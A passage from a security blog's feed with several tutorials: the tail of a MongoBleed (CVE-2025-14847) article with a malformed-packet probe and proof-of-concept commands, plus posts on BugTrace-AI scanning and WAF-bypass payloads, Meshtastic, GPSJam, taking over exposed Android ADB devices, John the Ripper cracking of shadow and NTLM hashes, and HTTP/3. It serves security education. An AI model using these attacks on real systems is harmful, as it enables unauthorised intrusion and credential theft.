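    # OP_COMPRESSED body: originalOpcode, claimed uncompressedSize, compressorId (2 = zlib)
    # The lie is claimed_size: far larger than what the payload really expands to
    body = struct.pack("<iiB", OP_MSG, claimed_size, 2) + compressed
    # Standard 16-byte header: messageLength, requestID, responseTo, opCode
    header = struct.pack("<iiii", 16 + len(body), 1, 0, OP_COMPRESSED)
    return header + body

probe = build_probe(claimed_size=50_000)
print(len(probe), probe[:16].hex())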

Affected Versions

The MongoBleed vulnerability affects a very broad range of MongoDB Server releases, covering almost a decade of versions. It impacts MongoDB 8.2.0 through 8.2.2, 8.0.0 through 8.0.16, 7.0.0 through 7.0.27, 6.0.0 through 6.0.26, 5.0.0 through 5.0.31, 4.4.0 through 4.4.29, as well as all releases in the 4.2.x, 4.0.x, and 3.6.x series. In simple terms, any deployment running a version released since mid-2017 may be at risk if it has not been updated.

The issue affects both Community and Enterprise editions and applies to environments running on-premises, in virtual machines, containers, or in the cloud. As long as the server has zlib compression enabled and is reachable over the network, it remains vulnerable.

MongoDB has issued fixes for all currently supported branches. Older versions such as 4.2, 4.0, and 3.6 no longer receive patches.

The Exploitation

To exploit the MongoBleed vulnerability, there are several proof-of-concept implementations available in different programming languages. One useful example is Joe Desimone’s PoC, which also includes a Docker Compose file that lets you quickly spin up a vulnerable MongoDB environment for testing.

To begin, clone the repository using the following command:

kali> git clone https://github.com/joe-desimone/mongobleed.git

By reviewing the mongobleed script, we can see how it generates malformed compressed BSON messages and attempts to capture memory bytes that the server unintentionally leaks.

To test the PoC, we’ll first set up a vulnerable MongoDB instance:

kali> docker-compose up -d

By checking the running Docker containers, we can see that mongobleed-target is active and listening on the default MongoDB port.

kali> sudo docker ps | grep mongo

Let’s run the exploit on it:

kali> python3 mongobleed.py --host localhost

This initial scan probed memory offsets from 20 to 8192. The exploit works by creating BSON documents with artificially large length fields. When MongoDB processes these documents, it reads field names from uninitialized memory until it encounters a null byte. Using different offsets gives access to different memory regions.

The leaked data can include internal MongoDB logs and state information, WiredTiger configuration details, system /proc data such as memory and network stats, file paths from inside the Docker container, and even connection UUIDs and client IP addresses.

To gather more information, we can run a deeper scan:

kali> python3 mongobleed.py --host localhost --max-offset 50000

According to Shodan, there are nearly 214,000 hosts running MongoDB.

However, it’s important to remember that many of these systems are already patched, and some do not use zlib compression at all, which makes MongoBleed ineffective against them.

Summary

MongoBleed is one of the most serious MongoDB vulnerabilities discovered in recent years, affecting almost ten years of server releases. Tracked as CVE-2025-14847, it carries a CVSS score between 7.5 and 8.7, depending on the scoring system. Its impact is severe because it requires no login, is easy to exploit over the network, and affects MongoDB versions from 3.6 up through 8.2.

In this article, we walked through the vulnerability, demonstrated how it can be exploited in a lab setup, and highlighted the potential attack surface it exposes.


Artificial Intelligence in Cybersecurity, Part 7: AI-Powered Vulnerability Scanning with BugTrace-AI

23 December 2025 at 10:43

Welcome back, aspiring cyberwarriors and AI enthusiasts!

AI is stepping up in every aspect of our cybersecurity job: STRIDE-GPT generates threat models and mitigations for them, BruteForceAI helps with password attacks, and LLM-Tools-Nmap conducts reconnaissance. Today, it's time to explore AI-powered vulnerability scanning.

In this article, we’ll cover the BugTrace-AI toolkit from installation through advanced usage. We’ll begin with setup and configuration, then explore each of the core analysis tools, including URL analysis, code review, and security header evaluation. Let’s get rolling!

What Is BugTrace-AI?

BugTrace-AI leverages Generative AI to understand context, identify logic flaws, and provide intelligent recommendations that adapt to each unique situation. The tool performs non-invasive reconnaissance and analysis, generating hypotheses about potential vulnerabilities that serve as starting points for manual investigation.

The platform integrates both Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST) within a single interface. It supports multiple AI models through OpenRouter, including Google Gemini, Anthropic Claude, and many more.

It’s important to recognize that this tool functions as an assistant rather than an automated exploitation tool. Based on that, we should understand that all findings should be deliberately validated.

Step #1: Installation

First of all, we need to clone the repository from GitHub:

kali> git clone https://github.com/yz9yt/BugTrace-AI.git

kali> cd BugTrace-AI

After listing the content of the downloaded directory, we can see the script we need: dockerizer.sh. We need to add execution permissions and launch it.

kali> chmod +x dockerizer.sh

kali> sudo ./dockerizer.sh

At this point, you may encounter an issue with the script, as it is currently incompatible with Docker Compose version 2 at the time of writing. To fix the script, you can manually change it or use the following:

#!/bin/bash
set -e

COMPOSE_FILE="docker-compose.yml"

echo "--- Stopping any previous containers... ---"
docker compose -f "$COMPOSE_FILE" down -v || \
  echo "Warning: 'docker compose down' failed. This might be the first run, which is okay."

echo "--- Building and starting the application... ---"
docker compose -f "$COMPOSE_FILE" up --build -d

echo "--- Application is now running! ---"
echo "Access it at: http://localhost:6869"
echo "To stop the application, run: docker compose -f $COMPOSE_FILE down"

# === Try to launch Firefox with checks ===
sleep 3 # Give the container a moment to start

if [ -z "$DISPLAY" ]; then
  echo "⚠️ No GUI detected (DISPLAY is not set)."
  echo "💡 Open http://localhost:6869 manually in your browser."
elif ! command -v firefox &> /dev/null; then
  echo "⚠️ Firefox is not installed."
  echo "💡 Install it with: sudo apt install firefox"
else
  echo "🚀 Launching Firefox..."
  firefox http://localhost:6869 &
fi

After updating the script, you should see the process of building the Docker image and starting the container in detached mode.

After finishing, you can now access BugTrace-AI at http://localhost:6869. You will see the disclaimer similar to the one below.

If you accept it, the app will load the main screen.

Step #2: Configuring API Access

BugTrace-AI requires an OpenRouter API key to function. OpenRouter provides unified access to multiple AI models through a single API, making it ideal for this application. Visit the OpenRouter website at https://openrouter.ai and create an account if you don’t already have one. Navigate to the API keys section and generate a new key.
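Before pasting the key into the app, you can sanity-check it with a short script. This is a sketch against OpenRouter's OpenAI-compatible chat completions endpoint; the model name is just an example, so substitute any model your account can access.

import requests

resp = requests.post(
    "https://openrouter.ai/api/v1/chat/completions",
    headers={"Authorization": "Bearer YOUR_OPENROUTER_KEY"},  # replace with your key
    json={
        "model": "google/gemini-2.5-flash",  # example model id
        "messages": [{"role": "user", "content": "ping"}],
    },
    timeout=30,
)
print(resp.status_code)  # 200 means the key is accepted
print(resp.json())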

In the BugTrace-AI interface, click the Settings icon in the header. This opens a modal where you can enter your API key.

Step #3: Understanding the Three Scan Modes

BugTrace-AI offers three URL analysis modes, each designed for different scenarios and authorization levels.

The Recon Scan focuses entirely on passive reconnaissance. It analyzes the URL structure looking for patterns that might indicate vulnerabilities, performs technology fingerprinting using public databases, searches CVE databases for vulnerabilities in identified technologies, and checks public exploit databases like Exploit-DB for available exploits. This mode never sends any traffic to the target beyond the initial page load.

The Active Scan analyzes URL patterns and parameters to hypothesize vulnerabilities. Despite its name, this mode remains “simulated active” because it doesn’t actually send attack payloads. Instead, it uses AI reasoning to identify URL patterns that commonly correlate with vulnerabilities. For example, URLs with parameters named “id” or “user” might be susceptible to SQL injection, while parameters that appear in the page output could be vulnerable to XSS. The AI generates hypotheses about potential vulnerabilities based on these patterns and offers guidance on how to test them manually.

The Grey Box Scan combines DAST with SAST by analyzing the page’s live JavaScript code. After loading the target URL, the tool extracts all JavaScript code from the page, including inline scripts and external files. The AI then performs static analysis on this JavaScript, looking for client-side vulnerabilities, hardcoded secrets or API keys, insecure data handling patterns, and client-side logic flaws.

For this exercise, we’ll analyze a web application with the third mode.

The tool generates a report summarizing its findings.

BugTrace-AI highlights possible vulnerabilities and suggests what to test manually based on what it finds. You can also review all results with the Agent, which remembers context so you can ask follow-up questions about earlier findings or how to verify them.

Step #4: Payload Generation Tools

Web Application Firewalls (WAFs) attempt to block malicious requests by detecting attack patterns. The Payload Forge helps bypass WAF protections by generating payload variations using obfuscation and encoding techniques.

The tool generates a few dozen payloads. Each of them includes an explanation of the obfuscation technique used and the specific WAF detection methods it’s designed to evade.

Besides that, BugTrace-AI offers an SSTI payload generator and an OOB Interaction Helper.

Summary

BugTrace-AI is a next-generation vulnerability scanning tool. Unlike traditional scanners that rely on rule-based detection, BugTrace-AI focuses on understanding the logic and context of its target.

In this article, we installed the tool and tested some of its features. But this is not a comprehensive guide; BugTrace-AI offers many more capabilities designed to make cybersecurity work easier. We encourage you to install the tool and explore its full potential on your own. Keep in mind that it is not an all-in-one solution, and every finding should be manually verified.

If you want to dive deeper into using AI for hacking, consider checking out our AI for Cybersecurity training. This 7-hour video course, led by Master OTW, is designed to take your understanding and practical use of artificial intelligence to the next level.


Off-Grid Communications, Part 1: Introduction to Meshtastic Networks

19 December 2025 at 08:44

Welcome back, my aspiring cyberwarriors!

In our eventful time, the ability to communicate off-grid has become more valuable than ever. Whether you’re preparing for emergencies, exploring remote locations, or simply want a decentralized communication network that doesn’t rely on cellular towers or internet infrastructure, Meshtastic offers a powerful solution.

In this article, we will explore what Meshtastic is and what it has to offer.

What is Meshtastic?

Meshtastic is an open-source mesh networking platform that leverages LoRa (Long Range) radio technology to create decentralized communication networks. Unlike traditional communications that depend on cellular networks or WiFi, Meshtastic enables devices to communicate directly with each other over long distances, creating a self-healing network where messages hop from node to node until they reach their destination.

The platform is built around the concept of decentralization, meaning no central server or infrastructure is required. Each node operates independently while contributing to the network’s overall reach. With LoRa technology you can communicate over several kilometers. Some configurations have achieved ranges of 10-20km in open terrain.

The low power consumption design makes it excellent for battery-operated devices and for portable and remote deployments. Meshtastic works across various hardware platforms, including ESP32, Raspberry Pi, and dedicated LoRa boards, and the cost-effectiveness of the required hardware components means basic nodes can be built for under $50.

Key Purposes and Use Cases

The primary purposes and use cases of these communication systems include supporting outdoor activities like hiking, camping, backpacking, and off-roading, allowing groups to stay in touch over long distances without relying on cellular towers. They are also essential in emergency and disaster response situations, providing communication during natural disasters, power outages, or other scenarios where cellular networks fail. These systems play a crucial role in search and rescue operations as well.

Meshtastic Node Map

Additionally, they facilitate messaging in remote or restricted areas where connectivity is poor or internet access is limited. Community members and hobbyists use these systems to create local mesh networks for experimentation, conduct large-scale testing at events such as DEF CON, or establish backup communication systems for urban areas.

Ultimately, these universal communication systems enhance safety, build community connections, and ensure reliable communication in various challenging environments.

How Does Meshtastic Work?

Meshtastic operates on hardware such as ESP32-based boards (e.g., Heltec, LilyGO T-Beam) or pre-built nodes equipped with LoRa modules. These devices are programmed with Meshtastic firmware and function on unlicensed ISM radio bands, making them legal in most regions without the need for a ham radio license, although using higher power may require one in certain areas.

A LILYGO TTGO T-Beam running in client mode on battery power

Communication Process

Sending a Message: To send a message, connect a Meshtastic device (referred to as a “node”) to your phone via Bluetooth (or sometimes Wi-Fi/serial) using companion apps available for Android, iOS, web, or desktop. Type your message in the app, and it will be sent to your node.

Broadcasting: The node then broadcasts the encrypted message packet over the LoRa radio. It is important to note that LoRa is designed for low-bandwidth communication, making it suitable for short text messages but not for voice or video.

Meshing and Relaying: Nearby nodes that receive the packet check if it is new (nodes track received packets to avoid duplicates). If it is new, they will rebroadcast it after decrementing a “hop limit” (the default is around 3 hops to prevent infinite looping). This creates a flooding mesh that relays the message from node to node until it reaches the intended recipient(s) or the hop limit is exhausted.

Receiving: The destination node receives the packet, decrypts it using AES256 encryption with shared channel keys, and forwards it to the connected app or phone for display. Additionally, nodes can share location data to map group positions.
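To see what the phone-to-node step looks like in code, here is a minimal sketch using the official Meshtastic Python library (installed with pip install meshtastic), assuming your node is connected over USB serial rather than Bluetooth:

import meshtastic.serial_interface

# Auto-detects the serial port of the connected node
interface = meshtastic.serial_interface.SerialInterface()

# Broadcast a short text message on the default (primary) channel
interface.sendText("Hello from the mesh!")

interface.close()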

Differences Between LTE, 5G, and Meshtastic

Many of us depend on LTE and 5G networks daily, so it’s important to compare them with Meshtastic.

| Aspect | Meshtastic (LoRa Mesh) | LTE (4G) | 5G |
| --- | --- | --- | --- |
| Technology | LoRa radio (915 MHz ISM band in US, license-free) | Cellular (various bands, e.g., 700–2600 MHz) | Cellular (sub-6 GHz + mmWave high bands) |
| Infrastructure | Decentralized mesh: user-deployed nodes relay messages | Centralized: carrier-owned cell towers | Centralized: dense cell towers + small cells |
| Coverage/Range | 5–20+ km per hop (line-of-sight, terrain-dependent); extends via mesh | Nationwide/global where towers exist; indoor/outdoor | Similar to LTE but denser for high speeds; mmWave short-range |
| Data Speed | Very low: ~0.5–20 kbps (text-only, short messages) | 5–100 Mbps typical (up to 300 Mbps peak) | 100 Mbps–1+ Gbps typical (up to 10–20 Gbps theoretical) |
| Latency | Seconds to minutes (mesh hopping) | 20–50 ms | 1–10 ms (ultra-low for real-time apps) |
| Data Types | Text messages, GPS positions, basic telemetry | Voice, video, high-speed internet, apps | All LTE + AR/VR, IoT, autonomous vehicles |
| Power Consumption | Very low: weeks/months on battery/solar | Moderate: drains phone battery quickly | Higher (especially mmWave); improved efficiency in newer devices |
| Cost | Low one-time (devices + optional solar); no subscriptions | Monthly plan + device | Higher plans; premium for full speeds |
| Reliability in Outages | Excellent: works off-grid, no single point of failure | Fails without power/towers (e.g., disasters) | Same as LTE; more vulnerable to congestion |
| Limitations | Text-only, slow, needs multiple nodes for range | Requires signal/subscription | Limited high-speed coverage; higher battery drain |

These technologies serve different purposes: Meshtastic for resilient, infrastructure-independent communication in remote or emergency scenarios, versus LTE/5G for high-speed, everyday mobile internet and voice.

Summary

Meshtastic is a free and user-friendly tool that enables you to send messages without relying on the internet or mobile networks. It connects small, specialized devices to form a network, allowing communication over long distances. This makes it ideal for outdoor adventures, emergencies, or communication in remote areas.

Stay tuned as we continue to explore off-grid communication and simulate the mesh network using minimal hardware equipment in future articles.

Open Source Intelligence (OSINT): Explore GPS/GNSS Jamming Around the World

16 December 2025 at 15:07

Welcome back, aspiring cyberwarriors!

In our previous article on anti-drone warfare, we discussed the topic of jamming. Based on observations from the Russian-Ukrainian war, jamming is not only a legitimate electronic warfare technique but also a highly effective one. One notable incident involved Ursula von der Leyen’s plane, which was reportedly affected by suspected Russian GPS jamming. Furthermore, there have been numerous instances where weapons made by either Russia or the U.S. missed their targets due to GPS jamming. To further explore this issue, I would like to introduce a tool that visualizes GPS/GNSS disruptions affecting aircraft worldwide – GPSJam.

What Is GPSJam?

GPSJam.org is a website that offers information about GPS interference experienced by aircraft around the world. It utilizes data from ADS-B Exchange, a crowd-sourced flight tracking platform, to create daily maps that show areas likely to experience GPS interference. These maps are based on aircraft reports regarding the accuracy of their navigation systems.

It’s worth mentioning that GPSJam focuses not solely on GPS but also on GNSS in general. GNSS, or Global Navigation Satellite System, is a broad term that refers to any satellite navigation system capable of providing global coverage. This category includes various satellite-based positioning systems. Examples of GNSS include GPS (Global Positioning System) from the United States, GLONASS from Russia, Galileo from the European Union, and BeiDou from China.

How Does It Work?

Most aircraft are typically equipped with a device known as ADS-B Out, which stands for “Automatic Dependent Surveillance-Broadcast.” This system allows a plane to share its location, speed, and altitude with air traffic control and other aircraft in the vicinity. Additionally, it serves as a vital navigation tool that assists planes in approaching for landing.

Flight professionals and enthusiasts use specialized equipment to receive this information and relay it to flight-tracking websites like ADS-B Exchange. These platforms then visualize the flight data on interactive maps.

When aircraft utilize ADS-B Out, they not only transmit their position but also indicate the accuracy of that position. According to the tool provider, “when there is interference with their GPS, the uncertainty goes up.” Therefore, greater interference leads to decreased accuracy. Conversely, when there is little or no interference, the accuracy improves. Essentially, ADS-B Exchange collects data on the accuracy of an aircraft’s position. The tool provider aggregates this information over a 24-hour period and organizes it into hexagon sections, assigning different colors to represent varying levels of accuracy.

Get Started with GPSJam

To begin investigating where Russians or others conduct jamming, we should simply open https://gpsjam.org/ in our browser.

One of the most valuable functions is filtering by date. Keep in mind, though, that historical data only goes back to 14 February 2022.

Additionally, there are further settings that enable filtering by location and traffic threshold.
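
The map state is also encoded in the URL, which makes it easy to bookmark or share a specific view. For example, a link of the following shape (parameter names taken from the site's current URLs and subject to change) opens the map centered on a region for a given date:

https://gpsjam.org/?lat=55.7&lon=37.6&z=5&date=2024-02-14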

GPSJam clearly demonstrates GPS/GNSS interference; however, it’s important to note that some output data on this website may not be solely due to jamming. GNSS interference could also result from hardware issues in aircraft, as well as from weather conditions.

Summary

Jamming represents the forefront of cyber warfare. Tools like GPSJam can help identify areas experiencing jamming without the need for additional hardware or security clearance.

If you are a dedicated OSINT investigator, consider exploring this tool, as it may enhance your work. Furthermore, if you’re new to the field of Open Source Intelligence, check out our OSINT training.

Android Hacking: How Hackers Use Android Debug Bridge (ADB) to Take Over Devices

15 December 2025 at 10:46

Welcome back, aspiring cyberwarriors!

According to StatCounter, in 2025 Android powers over 3.3 billion users worldwide, dominating the global mobile OS market with a 71.85% share. But beyond phones, Android also powers a wide range of devices, including tablets, TVs, automotive systems, XR devices, and more.

Today, I’d like to show you how all of these devices can be hacked in seconds due to the negligence of their owners.

Android Debug Bridge (ADB)

Android Debug Bridge (ADB) is a versatile command-line tool that allows you to communicate with an Android device or emulator. The ADB command enables various device actions, such as installing and debugging apps. It also provides access to a Unix shell, letting you run a wide range of commands directly on the device.

ADB is a client-server program composed of three main components:

  • Client: Runs on your development machine and sends commands. You invoke the client by issuing ADB commands from a terminal.
  • Server: Also runs on your development machine as a background process. It manages communication between the client and the device daemon, handling multiple device connections.
  • Daemon (adbd): Runs as a background process on each connected Android device or emulator. It executes commands sent from the server.

ADB can be accessed via both USB and Wi-Fi. When ADB is enabled over Wi-Fi (also known as ADB over TCP/IP), it listens on port 5555 and can accept connections from any device that can reach it — not just those on the same Wi-Fi network, but potentially from other networks via the internet if the device’s port is exposed, effectively opening a door for hackers.

Recon

To find systems with exposed ADB, we can use the well-known service Shodan — for example, by using the search query: “Android Debug Bridge port:5555”.

You can use nmap to check if there’s an ADB server on a target host like this:

kali> nmap <IP> -p 5555 -sV

If the service is running and allows unauthorized access, you might be able to see some valuable information, such as the system name, model, and available features.

Attack Via ADB Shell

First of all, we need to install the ADB client, which we can do with the following command:

kali> sudo apt install adb

You can check if the installation succeeded by viewing the help screen:

kali> adb --help

After that, we can try to connect:

kali> adb connect <ip>:<port>

We can list the connected devices with the command:

kali> adb devices

And move directly to the shell:

kali> adb shell

And we’re immediately granted root access to the system. We can do anything we want.

Post-Exploitation

Once ADB shell access is obtained, a single session can be useful but remains limited. Real offensive operations demand persistent access, remote control, and covert data channels. This is where Command and Control (C2) becomes essential. I won’t cover it here, as it’s a broad topic, but you can learn more in our Infrastructure Basics for Hackers course.

Conclusion

ADB is not inherently insecure, but when misconfigured, it becomes one of the fastest ways to compromise an Android-based system. The attacker does not need a CVE or an exploit chain. All they need is port 5555 and silence on the defender’s side.

Thousands of devices remain exposed today—mostly smart TVs, Android TV boxes, routers, IoT appliances, and older smartphones. These devices are often unpatched, unmanaged, and forgotten.

Find out if your phone has been hacked and how to investigate it by attending our Mobile Forensics class.

Password Cracking: Getting Started with John the Ripper

13 December 2025 at 09:56

Welcome back, aspiring cyberwarriors!

John the Ripper (often called “John”) is a tool that earned a reputation as one of the most powerful and versatile in the field. Originally developed by Openwall, John has become an essential tool for penetration testers, security auditors, and anyone else who needs to assess password strength.

In this tutorial, you’ll learn how to use John the Ripper from the ground up. We’ll start with installation and basic concepts, then move through the three main password cracking modes with hands-on exercises for each. Let’s get rolling!

What Makes John the Ripper Powerful?

John the Ripper works by comparing password hashes against potential passwords. It generates candidate passwords, hashes them using the same algorithm as the target, and checks for matches. This approach is effective against various hash types, including MD5, SHA-1, SHA-256, bcrypt, and more.

In addition, the tool supports multiple platforms, including Linux, Windows, and macOS. It features multiple cracking modes, including Single, Wordlist, and Incremental approaches. John supports extensive hash formats, allowing you to crack dozens of different hash types. Besides that, you can create customizable rules to generate password variations, and the Jumbo version even includes GPU acceleration for significantly faster cracking.

Installation

John the Ripper is pre-installed on Kali Linux. Verify the installation:

kali> john

For Ubuntu/Debian, you can install John from the apt repository:

kali> sudo apt install john

Once you have installed John, try the help command to make sure your installation is working.

kali> john -h

Understanding Password Cracking Modes

John the Ripper offers three primary cracking modes, each suited for different scenarios.

1. Single Crack Mode

Single Crack Mode uses information from the username to generate password variations. This mode is surprisingly effective because users often create passwords based on their usernames.

You should use Single Crack Mode as a quick first attempt, especially when you have username information available. The syntax is straightforward:

kali> john --single --format=FORMAT hashfile.txt

The mode works by taking patterns from the username and generating variations. If the username is “hacker”, John will try variations like Hacker2025, HACKER2025, hacker2025!, 2025hacker, and many more permutations based on capitalization changes, number additions, and common character substitutions.
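
If you want to reproduce this, note that single crack mode needs the username in the hash file, so use the user:hash format. A quick way to generate a test SHA-256 hash for the hypothetical user "hacker" (a sketch):

kali> echo -n 'Hacker2025' | sha256sum | awk '{print "hacker:" $1}' > hash.txt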

The command for cracking will be the following:

kali> john --single --format=raw-sha256 hash.txt

And immediately, we got an output with the password.

2. Wordlist Mode (Dictionary Attack)

Wordlist Mode compares hashes against a list of potential passwords from a dictionary file. This is the most commonly used mode for password cracking because it balances speed with effectiveness.

You should use Wordlist Mode when you have a good wordlist, which covers most real-world scenarios. The syntax requires specifying both the wordlist file and the hash format:

kali> john --wordlist=WORDLIST_FILE --format=FORMAT hashfile.txt

The RockYou wordlist is the most famous collection, containing over 14 million passwords leaked from the RockYou.com breach. But your cracking process should not be focused on this list. Consider creating your own wordlist, specific to your target. We’ve covered previously how to do so with tools like crunch and cupp.
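
Note that on a fresh Kali install, the RockYou list ships compressed; decompress it once before use:

kali> sudo gunzip /usr/share/wordlists/rockyou.txt.gz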

But for demonstration purposes, I created a hash file with the password from a RockYou list.
The command for cracking will be the following:

kali> john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256 hash.txt

3. Incremental Mode (Brute Force)

Incremental Mode tries all possible character combinations. This is the most thorough but slowest method, making it suitable only for specific scenarios.

You should use Incremental Mode as a last resort, particularly for short passwords when other methods have failed. The basic syntax is:

kali> john --incremental --format=FORMAT hashfile.txt

This mode exhaustively tries every possible combination of characters, starting with single characters and working up to longer passwords. This process can take days, weeks, or even years for moderately long passwords.

The command for cracking will be the following:

kali> john --incremental --format=raw-sha256 hash.txt
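
If you know something about the password's structure, you can narrow the search with one of John's predefined incremental character sets from john.conf. For example, a digits-only run cracks numeric passwords quickly:

kali> john --incremental=Digits --format=raw-sha256 hash.txt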

Cracking Windows NTLM Hashes

In Windows, password hashes are stored in the SAM database. The SAM uses the LM/NTLM hash format for passwords, and we can use John the Ripper to crack one of these hashes. Retrieving passwords from the SAM database is beyond the scope of this article, but let’s assume you have obtained a password hash for a Windows user. Here is the command to crack it:

kali> john --format=NT ntlm_hash.txt

Without a cracking mode specified, John falls back to its default order: single crack mode first, then wordlist mode with the default list, and finally incremental mode.
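
Because NT hashes compute extremely fast, a wordlist pass is usually worth running against them as well:

kali> john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt ntlm_hash.txt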

Cracking a Linux Password

In Linux, two important files are stored in the /etc directory: passwd and shadow. The passwd file contains information such as the username, user ID, and login shell, while the shadow file holds the password hash, expiration details, and other related data.

Besides the main “john” command, John the Ripper includes several additional utilities, one of which is called unshadow. This tool merges the passwd and shadow files into a single combined file that John can process when cracking passwords.

Here is how you use the unshadow command:

kali> unshadow passwd shadow > hash.txt

This command will combine the files and create a hash.txt file. Now, we can crack the hash using John. One caveat: Kali's build of John the Ripper doesn't reliably auto-detect the Linux hash type (crypt). If you omit the --format flag below, John won't crack anything at all. So the command will be as follows:

kali> john --format=crypt hash.txt

Summary

John the Ripper is a robust tool for cracking passwords. It compares password hashes against potential passwords using various algorithms and is compatible with many types of hashes.

The tool runs on many different platforms and is designed to use resources efficiently, which is why it's a favorite among security professionals and aspiring hackers. With password attacks growing more sophisticated, John the Ripper remains a strong and valuable tool in the world of cybersecurity.

Network Security: Get Started with QUIC and HTTP/3

5 December 2025 at 09:53

Welcome back, aspiring cyberwarriors!

For decades, traditional HTTP traffic over TCP, also known as HTTP/1 and HTTP/2, has been the backbone of the web, and we have tools to analyze, intercept, and exploit it. But nowadays, we have HTTP/3, whose adoption across the web is steadily increasing. In 2022, around 22% of all websites used HTTP/3; in 2025, this number increased to ~40%. And as cyberwarriors, we need to stay ahead of these changes.

In this article, we briefly explore what's under the hood of HTTP/3 and how we can start working with it. Let's get rolling!

What is HTTP/3?

HTTP/3 is the newest evolution of the Hypertext Transfer Protocol—the system that lets browsers, applications, and APIs move data across the Internet. What sets it apart is its break from TCP, the long-standing transport protocol that has powered the web since its earliest days.

TCP (Transmission Control Protocol) is reliable but inflexible. It was built for accuracy, not speed, ensuring that all data arrives in perfect order, even if that slows the entire connection. Each session requires a multi-step handshake, and if one packet gets delayed, everything behind it must wait. That might have been acceptable for email, but it’s a poor fit for modern, high-speed web traffic.

To overcome these limitations, HTTP/3 uses QUIC (Quick UDP Internet Connections), a transport protocol built on UDP and engineered for a fast, mobile, and latency-sensitive Internet. QUIC minimizes handshake overhead, avoids head-of-line blocking, and encrypts nearly the entire connection by default—right from the start.

After years of development, the IETF officially standardized HTTP/3 in 2022. Today, it’s widely implemented across major browsers, cloud platforms, and an ever-growing number of web servers.

What Is QUIC?

Traditional web traffic follows a predictable pattern. A client initiates a TCP three-way handshake, then performs a TLS handshake on top of that connection, and finally begins sending HTTP requests. QUIC collapses this entire process into a single handshake that combines transport and cryptographic negotiation. The first time a client connects to a server, it can establish a secure connection in just one round trip. On subsequent connections, QUIC can achieve zero round-trip time resumption, meaning the client can send encrypted application data in the very first packet.

The protocol encrypts almost everything except a minimal connection identifier. Unlike TLS over TCP, where we can see TCP headers, sequence numbers, and acknowledgments in plaintext, QUIC encrypts packet numbers, acknowledgments, and even connection close frames. This encryption-by-default approach significantly reduces the metadata available for traffic analysis.

QUIC also implements connection migration, which allows a connection to survive network changes. If a user switches from WiFi to cellular, or their IP address changes due to DHCP renewal, the QUIC connection persists using connection IDs rather than the traditional four-tuple of source IP, source port, destination IP, and destination port.

QUIC Handshake

The process begins when the client sends its Initial packet. This first message contains the client’s supported QUIC versions, the available cipher suites, a freshly generated random number, and a Connection ID — a randomly chosen identifier that remains stable even if the client’s IP address changes. Inside this Initial packet, the client embeds the TLS 1.3 ClientHello message along with QUIC transport parameters and the initial cryptographic material required to start key negotiation. If the client has connected to the server before, it may even include early application data, such as an HTTP request, to save an extra round trip.

The server then responds with its own set of information. It chooses one of the client’s QUIC versions and cipher suites, provides its own random number, and supplies a server-side Connection ID along with its QUIC transport parameters. Embedded inside this response is the TLS 1.3 ServerHello, which contains the cryptographic material needed to derive shared keys. The server also sends its full certificate chain — the server certificate as well as the intermediate certificate authorities (CAs) that signed it — and may optionally include early HTTP response data.

Once the client receives the server’s response, it begins the certificate verification process. It extracts the certificate data and the accompanying signature, identifies the issuing CA, and uses the appropriate root certificate from its trust store to verify the intermediate certificates and, ultimately, the server’s certificate. To do this, it hashes the received certificate data using the algorithm specified in the certificate, then checks whether this computed hash matches the one that can be verified using the CA’s public key. If the values match and the certificate is valid for the current time period and the domain name in use, the client can trust that the server is genuine. At this point, using the TLS key schedule, the client derives the QUIC connection keys and sends its TLS Finished message inside another QUIC packet. With this exchange completed, the connection is fully ready for encrypted application data.

From this moment onward, all traffic between the client and server is encrypted using the established session keys. Unlike traditional TCP combined with TLS, QUIC doesn’t require a separate TLS handshake phase. Instead, TLS is tightly integrated into QUIC’s own handshake, allowing the protocol to eliminate extra round-trips. One of the major advantages of this design is that both the server and client can include actual application data — such as HTTP requests and responses — within the handshake itself. As a result, certificate validation and connection establishment occur in parallel with the initial exchange of real data, making QUIC both faster and more efficient than the older TCP+TLS model.

How Does QUIC Network Work?

The image below shows the basic structure of a QUIC-based network. As illustrated, HTTP/3 requests, responses, and other application data all travel through QUIC streams. These streams are encapsulated in several logical layers before being transmitted over the network.

Anatomy of a QUIC stream:

A UDP datagram serves as the outer transport container. It contains a header with the source and destination ports, along with length and checksum information, and carries one or more QUIC packets. This is the fundamental unit transmitted between the client and server across the network.

A QUIC packet is the unit contained within a UDP datagram, and each datagram may carry one or more of them. Every QUIC packet consists of a QUIC header along with one or more QUIC frames.

The QUIC header contains metadata about the packet and comes in two formats. The long header is used during connection setup, while the short header is used once the connection is established. The short header includes the connection ID, packet number, and key phase, which indicates the encryption keys in use and supports key rotation. Packet numbers increase continuously for each connection and key phase.

A frame is the smallest structured unit inside a QUIC packet. It contains the frame type, stream ID, offset, and a segment of the stream’s data. Although the data for a stream is spread across multiple frames, it can be reassembled in the correct order using the connection ID, stream ID, and offset.

A stream is a unidirectional or bidirectional channel of data within a QUIC connection. Each QUIC connection can support multiple independent streams, each identified by its own ID. If a QUIC packet is lost, only the streams carried in that packet are affected, while all other streams continue uninterrupted. This independence is what eliminates the head-of-line blocking seen in HTTP/2. Streams can be created by either endpoint and can operate in both directions.

HTTP/3 vs. HTTP/2 vs. HTTP/1: What Actually Changed?

To understand the significance of HTTP/3, it helps to first consider the limitations of its predecessors.

HTTP/1.1, the original protocol still used by millions of websites, handles only one request per TCP connection. This forces browsers to open and close multiple connections just to load a single page, resulting in inefficiency, slower performance, and high sensitivity to network issues.

HTTP/2 introduced major improvements, including multiplexing, which allows multiple requests to share a single TCP connection, as well as header compression and server push. These changes provided significant gains, but the protocol still relies on TCP, which has a fundamental limitation: if one packet is delayed, the entire connection pipeline stalls. This phenomenon, known as head-of-line blocking, cannot be avoided in HTTP/2.

HTTP/3 addresses this limitation by replacing TCP with a more advanced transport layer. Built on QUIC, HTTP/3 establishes encrypted sessions faster, typically requiring only one round-trip instead of three or more. It eliminates head-of-line blocking by giving each stream independent flow control, allowing other streams to continue even if one packet is lost. It can maintain sessions through IP or network changes, recover more gracefully from packet loss, and even support custom congestion control tailored to different workloads.

In short, HTTP/3 is not merely a refined version of HTTP/2. It is a fundamentally redesigned protocol, created to overcome the limitations of previous generations, particularly for mobile users, latency-sensitive applications, and globally distributed traffic.

Get Started with HTTP/3

Modern versions of curl (7.66.0 and later with HTTP/3 support compiled in) can test whether a target supports QUIC and HTTP/3. Here’s how to probe a server:

kali> curl --http3 -I https://www.example.com

This command attempts to connect using HTTP/3 over QUIC, but will fall back to HTTP/2 or HTTP/1.1 if QUIC isn’t supported.
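
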